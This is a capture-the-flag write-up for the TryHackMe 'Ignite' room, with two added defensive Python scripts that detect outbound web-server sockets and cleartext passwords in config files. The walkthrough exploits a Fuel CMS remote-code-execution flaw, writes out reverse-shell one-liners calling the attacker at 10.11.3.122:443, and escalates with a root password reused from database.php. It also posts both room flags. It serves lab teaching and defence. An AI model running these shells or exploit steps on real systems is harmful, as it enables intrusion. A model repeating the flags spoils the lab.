thm-ignite-nl

Description: A new start-up has a few issues with their web server.

Free room, Difficulty: Easy

https://tryhackme.com/room/ignite


Nmap

>:sudo nmap -sC -sV 'machine-ip'

This is the scan method I use most of the time. With -sC it runs the default nmap scripts and with -sV it detects the version of every service on the open ports. My results were:

Nmap scan result

The open port is 80 (HTTP). The website itself runs a content management system (CMS) named Fuel CMS.

GoBuster

To further enumerate the machine I want to scan it for directories, including hidden ones. For this I’m using GoBuster with the machine IP address and a wordlist of commonly used directory names:

>:gobuster dir -u http://'machine-ip' -w /usr/share/dirb/wordlists/common.txt

GoBuster scan result

A lot of directories! I went through all of them, and one useful result was “/fuel”, which we also saw in the nikto scan result above; it turns out to be a login page.

Login page of fuelCMS

Because CMSs tend to have a lot of weak points, let’s check whether there is an exploit for Fuel CMS on “exploit-db”.

Search result on exploit-db

One result, CVE-2018-16763, gives us Remote Code Execution against the CMS. I downloaded the script and entered my own IP address, then marked it as executable and ran it. The output contained errors, mostly caused by the proxy settings. To make the exploit work I had to comment out the proxy entries; that got rid of the errors. The exploit script should now look like this:

https://github.com/puckiestyle/python/blob/master/fuelcms141rce.py

Entering the command whoami then got me the output www-data.

Command execution

There are still some errors at the bottom, but we got the desired output at the top.

Privilege Escalation

Since I am now able to execute commands, I entered the code for a reverse shell. To catch the connection and its output, we first have to set up a netcat listener:

>:nc -lnvp 443

Now we can enter our reverse shell code (bash or python, choose whatever you like).

>:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.122 443 >/tmp/f
>:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.3.122",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then I stabilized the shell with:

>:python -c 'import pty; pty.spawn("/bin/bash")'

Note: I found out that the su command used later on needs a terminal, so stabilizing the shell is essential to reach the solution.
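From the defender’s side, the reverse shell above leaves a clear host-level trace: the web server account (www-data) suddenly owns an ESTABLISHED TCP socket on an ephemeral local port, i.e. a connection the process opened itself rather than one a visitor opened to port 80. The following script is an added example (not part of the original write-up or of the room) that parses the /proc/net/tcp table and flags such sockets. It assumes the web server runs as UID 33 (www-data on Debian/Ubuntu) and a little-endian host; the sample table is constructed, with the remote address taken from the listener IP used in the post.

```python
from __future__ import annotations
import socket
import struct

# UID of the web server account on Debian/Ubuntu (www-data); an assumption of this example.
WEB_SERVER_UID = 33
LISTEN = "0A"       # TCP_LISTEN state code in /proc/net/tcp
ESTABLISHED = "01"  # TCP_ESTABLISHED state code


def decode_addr(hex_addr: str) -> tuple[str, int]:
    """Turn 'AABBCCDD:PPPP' from /proc/net/tcp into ('a.b.c.d', port).
    The kernel prints the IPv4 address as a host-order 32-bit word, so on a
    little-endian machine the bytes must be reversed (struct '<I')."""
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text: str) -> list[dict]:
    """Parse the table format of /proc/net/tcp into a list of socket records."""
    rows = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 8:
            continue
        local_ip, local_port = decode_addr(fields[1])
        remote_ip, remote_port = decode_addr(fields[2])
        rows.append({
            "local_ip": local_ip, "local_port": local_port,
            "remote_ip": remote_ip, "remote_port": remote_port,
            "state": fields[3], "uid": int(fields[7]),
        })
    return rows


def find_outbound_from_uid(rows: list[dict], uid: int) -> list[dict]:
    """Return established sockets owned by `uid` whose local port is not one
    the host listens on, i.e. connections the process opened itself.
    A web server account normally has no reason to hold such sockets."""
    listening = {r["local_port"] for r in rows if r["state"] == LISTEN}
    return [r for r in rows
            if r["state"] == ESTABLISHED and r["uid"] == uid
            and r["local_port"] not in listening]


# Constructed sample in /proc/net/tcp format (not captured from the room's machine):
# row 0: Apache listening on :80; row 1: an inbound visitor on :80;
# row 2: www-data holding a connection to 10.11.3.122:443 from an ephemeral port.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 17231 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:0050 7A030B0A:C8F2 01 00000000:00000000 00:00000000 00000000    33        0 17299 1 0000000000000000 20 4 30 10 -1
   2: 0F02000A:A3B2 7A030B0A:01BB 01 00000000:00000000 00:00000000 00000000    33        0 17302 1 0000000000000000 20 4 30 10 -1
"""


def scan(text: str = SAMPLE, uid: int = WEB_SERVER_UID) -> list[dict]:
    """Convenience wrapper: parse a /proc/net/tcp dump and return the suspicious sockets."""
    return find_outbound_from_uid(parse_proc_net_tcp(text), uid)


if __name__ == "__main__":
    # On a real host: scan(open("/proc/net/tcp").read())
    for hit in scan():
        print(f"uid {hit['uid']} -> {hit['remote_ip']}:{hit['remote_port']} "
              f"(local port {hit['local_port']})")
```

Run periodically (or wired into an agent), this is a cheap signal; the corresponding mitigation is egress filtering for the web server host, so that www-data cannot reach arbitrary external ports at all.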

Then I read the “user.txt” file with cat (*1). Next I searched for backups, because those tend to contain valuable information:

>:find / -type f -name "*.bak" 2>/dev/null

The 2>/dev/null at the end discards the “Permission denied” errors for all the files I don’t have permission to read.

After looking around, I found the password for root in /var/www/html/fuel/application/config/database.php.

password

root: mememe

So we just found the password for the root user, and now we can switch our account to root using the su command.

root-shell-1

After this you can just get the root flag from /root.
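The actual weakness here is that the database password stored in database.php was also the root account’s password, so any account that can read the config file (here www-data, after the RCE) owns the box. The script below is an added example, not code from the write-up or from Fuel CMS: it walks a web root, reports PHP config files that carry a non-empty cleartext password, and notes whether the file is readable by every local account. The two password patterns (CodeIgniter-style `$db['default']['password'] = '...'` and `'password' => '...'`) and the demo tree are assumptions; the sample file contents are constructed.

```python
from __future__ import annotations
import os
import re
import stat
import tempfile
from pathlib import Path

# Two CodeIgniter-style ways a database.php can hold the password.
# Both patterns are assumptions about the layout, not taken from the room's file.
PASSWORD_PATTERNS = [
    re.compile(r"""\$db\[['"]\w+['"]\]\[['"]password['"]\]\s*=\s*['"]([^'"]*)['"]"""),
    re.compile(r"""['"]password['"]\s*=>\s*['"]([^'"]*)['"]"""),
]


def audit_config_file(path: Path) -> dict | None:
    """Report a config file holding a non-empty cleartext password, plus
    whether accounts other than the owner/group can read it."""
    text = path.read_text(errors="replace")
    for pat in PASSWORD_PATTERNS:
        m = pat.search(text)
        if m and m.group(1):
            mode = path.stat().st_mode
            return {
                "file": str(path),
                "password_length": len(m.group(1)),  # never echo the secret itself
                "world_readable": bool(mode & stat.S_IROTH),
                "mode": oct(stat.S_IMODE(mode)),
            }
    return None


def audit_webroot(root: Path) -> list[dict]:
    """Walk a web root and collect every PHP file under a 'config' directory
    that stores a password."""
    findings = []
    for p in root.rglob("*.php"):
        if "config" in p.parts:
            finding = audit_config_file(p)
            if finding:
                findings.append(finding)
    return findings


def demo() -> list[dict]:
    """Build a constructed tree mirroring the path from the write-up and audit it.
    The password value is made up; it is not the one from the room."""
    root = Path(tempfile.mkdtemp())
    cfg = root / "fuel" / "application" / "config"
    cfg.mkdir(parents=True)
    db = cfg / "database.php"
    db.write_text(
        "<?php\n"
        "$db['default'] = array(\n"
        "    'hostname' => 'localhost',\n"
        "    'username' => 'root',\n"
        "    'password' => 'not-the-real-one',\n"  # constructed value
        ");\n"
    )
    os.chmod(db, 0o644)  # readable by every local account, a common default
    return audit_webroot(root)


if __name__ == "__main__":
    # On a real host: audit_webroot(Path("/var/www/html"))
    for f in demo():
        print(f)
```

A finding with world_readable set is the cue to tighten the file (for example 0640, owned by root with the web server’s group) and, more importantly, to make sure the database credential is unique and is never also a system account’s password; the script can only detect the first problem, the second has to be checked against your password policy.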

Summary

1. User.txt
– 6470e394cbf6dab6a91682cc8585059b

2. Root.txt
– b9bbcb33e11b80be759c4e844862482d

Author : Puckiestyle
